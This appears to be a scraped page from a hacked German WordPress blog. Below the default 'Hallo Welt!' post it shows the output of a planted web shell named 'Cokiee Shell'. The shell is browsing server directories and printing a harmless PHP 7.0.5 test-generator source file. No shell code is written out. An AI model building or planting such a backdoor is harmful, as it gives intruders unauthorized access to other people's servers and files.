Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/scripts/dev/generate-phpt/src/testcase/ |
Current File : //usr/local/src/php7/php-7.0.5/scripts/dev/generate-phpt/src/testcase/gtErrorTestCase.php |
<?php /** * Class for simple errors - one too many args and one too few */ abstract class gtErrorTestCase extends gtTestCase { protected $shortArgumentList = ''; protected $longArgumentList = ''; /** * Return instance of either method or function error test case * * @param string $type * @return test case object */ public static function getInstance($optionalSections, $type = 'function') { if($type == 'function') { return new gtErrorTestCaseFunction($optionalSections); } if($type =='method') { return new gtErrorTestCaseMethod($optionalSections); } } public function getShortArgumentList() { return $this->shortArgumentList; } public function getLongArgumentList() { return $this->longArgumentList; } public function constructSubjectCalls() { $this->argInit(); //Initialise the additional argument $this->testCase[] = "\$extra_arg = "; $this->subjectCalls(); } public function addErrorEcho() { $this->testCase[] = "echo \"*** Test by calling method or function with incorrect numbers of arguments ***\\n\";"; $this->testCase = gtCodeSnippet::appendBlankLines(1, $this->testCase ); } } ?>
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare